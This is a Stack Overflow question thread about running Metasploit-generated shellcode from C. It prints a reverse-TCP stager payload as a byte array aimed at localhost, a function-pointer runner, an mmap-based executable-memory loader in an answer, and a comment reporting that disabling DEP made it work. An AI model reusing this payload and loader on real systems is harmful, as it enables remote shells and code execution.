-1

I recently get interested in Metasploit, and I was trying to execute some shellcode from C code.

So i've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem because localhost) and selected C format for output.

Then I found this : http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/ and this : http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable

So what I did :

#include <stdio.h>

char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";

int main(int argc, char **argv) {
    int(*func) ();
    func = (int(*) ()) code;
    (int)(*func) ();    
}

Compiled it, launched it.. And crash....

Exception non gérée à 0x00338000 dans Shellcode.exe : 0xC0000005 : Violation d'accès lors de l'exécution à l'emplacement 0x00338000.

The crash is happening here : (int)(*func) ();

As I don't really understand what's the program is trying to do (I'm quite new to C), I don't know from where is the problem.. Is it my shellcode or is it the way it is called ?

And does someone has some documentation about executing shellcode in C/C++ ? Thanks all for your help.

Muhammad Shahzad
  • 9,340
  • 21
  • 86
  • 130
Survivor
  • 11
  • 3
  • 1) There is no language "C/C++", only the two **different** languages C and C++! 2) This is apparently C. 3) You invoke **undefined** behaviour. 4) See [ask], this is no "explain the code" site. – too honest for this site Sep 03 '16 at 15:26
  • 1
    "As I don't really understand what's the program is trying to do (I'm quite new to C), " - might it worth to first learn the C language? – Serge Sep 03 '16 at 15:28
  • 2
    So you are trying to hack a language you don't understand? – Weather Vane Sep 03 '16 at 15:28
  • @Olaf, 1) I know that there is 2 different languages, and i accept answers in these two languages. 2) Yeah it is 3) The last line is invoking undefined behavior, that's it ? 4) Alright thank you, I will check this. – Survivor Sep 03 '16 at 15:39
  • @Serge I have the basics, and usually to learn I start from a piece of code I don't understand and I try to reproduce it / improve it while learning. And it's something I never tried before.. – Survivor Sep 03 '16 at 15:41
  • @Weather Vane What do you mean by hacking ? I'm trying to make something works without really understanding it actually, which is very interesting because I'm discovering new things. – Survivor Sep 03 '16 at 15:43
  • @Survivor how can you mention Metasploit but not know what a hack is? I guess once you have your hack working with the code in the executable, your next step will be to try to apply said code externally, as program runtime input. – Weather Vane Sep 03 '16 at 16:14
  • OK, what if there is `system("format C:")` call is hidden in this program you don't understand? (or any other equivalent in terms of consequences that is valid for your system) – Serge Sep 03 '16 at 18:46

2 Answers2

0

You are getting segmentation fault because the memory is not marked as executable.

#include <unistd.h>
#include <sys/mman.h>
#include <string.h>

void *buf;

/* copy code to executable buffer */    
buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
              MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (buf, code, sizeof(code));

/* run code */
int i = ((int (*) (void))buf)();
printf("Return value [%d]\n", i);
4pie0
  • 29,204
  • 9
  • 82
  • 118
-1

The bytes represent machine instructions. On ordinary machines, the memory is broken in different memory segments, and code will typically goes in a data segment. The call:

int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();

tries to execute the code contained in these bytes.

However, modern operating systems provide usually by default a protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.

md5
  • 23,373
  • 3
  • 44
  • 93
  • Thank you for your answer, i cannot vote up actually.. So this call is modifying the stack, correct ? I already disabled some security on VS2013 with the /GS- option, but it seems that's it's not enough. I read your wikipedia article and i come back – Survivor Sep 03 '16 at 15:50
  • 1) C does not require a stack 2) static variables are typically **not** stored on the stack. 3) That wild casting invokes UB, i.e. it is not defined by the C language – too honest for this site Sep 03 '16 at 15:54
  • @Olaf: Thanks for 2), I missed the storage duration of `code` indeed. ;) As for 1), you won't bring an interesting answer whenever you stick only to the C standard here. – md5 Sep 03 '16 at 16:00
  • 1) How does it works if there is no stack ? 2) I've heard about different sections (data, text, ...), is there a "link" between this and the stack and the static variables, or it is totally off-topic? – Survivor Sep 03 '16 at 16:00
  • EDIT : Just disabled DEP, and it seems to work.. THank you so much, I'm going to keep learning about these protection and C and everything you spoke about in this discussion – Survivor Sep 03 '16 at 16:03
  • @md5: There is absolutely no need to bring up implementation details like stack/heap/data-segment/whatever here. Such questions can very well be answered sticking to the language. The fact an actual implementation just crashes or segfaults with an appropriate message in of no relevance here. – too honest for this site Sep 03 '16 at 16:03
  • @Olaf: Well I'm waiting for your answer then. The purpose of shellcodes is to go into these implementation details. If you only invoke undefined behavior, of course it will be correct, but it won't help. – md5 Sep 03 '16 at 16:06
  • @Survivor: To address a comment, use `@name`. Said that: You have to differentiate between standard and a specific implementation. Your question can be answered without going into implementation details. There is a lot to be found about compile creation and how they work. I'd recommend to do research on your own, an explanation is clearly OT here. – too honest for this site Sep 03 '16 at 16:06
  • @md5: Such code is no way meant to work on a proper system! Opposite, every sane OS tries to inhibit such exploits. And it is that construct which invokes UB, not me ... – too honest for this site Sep 03 '16 at 16:08
  • @Olaf OKAYYY i suppose I've understood why it wasn't working. Tell me if I'm wrong. My shellcode was stored in the exe file as string, so not in the section which own the "executable code" (.text, right ?). Because there is protections, the shellcode wasn't allowed to be executed, or to be added to the "operation list" (the stack ?) (I suppose i said it in "incorrect words" but that's the idea ?) – Survivor Sep 03 '16 at 16:08
  • @Survivor: Basically that' what might have happended. (Alternatively that code could have generated just tat messages by chance) But you missed the actual point: your code is not compliant C code, thus invokes UB, thus anything can happen. Be happy your OS apparently caught that code and reported appropriately. But that is nothing you should rely on. – too honest for this site Sep 03 '16 at 16:11
  • Why someone have down-voted the answer ? It helped me and correct my problem (so it's the solution) – Survivor Sep 03 '16 at 16:11
  • @Olaf: I don't understand your point. Such code is not portable, those are machine instructions! It is designed to work only on very specific implementations. Of course, this is not production code! Your explanation with UB is correct, but I believe it doesn't answer completely the OP question. Language lawyers sometimes reach their limits... – md5 Sep 03 '16 at 16:16
  • @Olaf: **Google-translated compliant** I suppose I'm not "skilled" (missing the good word) enough in C to understand how to do "C compliant code" but let's hope that it will keep working until i understand ^^. Can the behavior change from one execution to the other with UB ? – Survivor Sep 03 '16 at 16:19
  • @Survivor if the behaviour was fixed from one execution to another then it would be defined, and it isn't, so YES. Please [see this](http://stackoverflow.com/questions/7961067/how-undefined-is-undefined-behavior). – Weather Vane Sep 03 '16 at 16:25
  • @Weather Vane Thank you for your answer and your link – Survivor Sep 03 '16 at 16:55
  • @WeatherVane I understand the content of what you sended. In their case, it's UB because they create a pointer (without initialization) and try to modify the value pointed; but it can be anything because we don't know on what the pointer is pointing, so it will probably crash the program. Is that correct ? The problem in my code is that i don't understand the syntax like "int(*func) ();" so I don't exactly know what can cause an UB. But don't worry, I'm actually googling to know what does this syntax mean :) It's about function pointer (that's why my 1st search says) – Survivor Sep 03 '16 at 17:04
  • From what I just discovered : "int(*func) ();" create a function pointer called func with no args. – Survivor Sep 03 '16 at 17:07
  • And "func = (int(*) ()) code;" well.... I suppose this : http://stackoverflow.com/questions/21951381/what-does-int-ret-intcode-mean will help me – Survivor Sep 03 '16 at 17:11
  • @Survivor: How about first learning to walk before trying to run? First write correct code before starting to research what backgrounds a specific undefined behaviour has? Picking some suspicious code from the internet and trying to understand it is a very bad approach - especially to learning C. – too honest for this site Sep 03 '16 at 17:56
  • @Olaf: Thanks for your answer. What do you mean by "correct code" ? What's the approach you recommend me ? – Survivor Sep 03 '16 at 18:25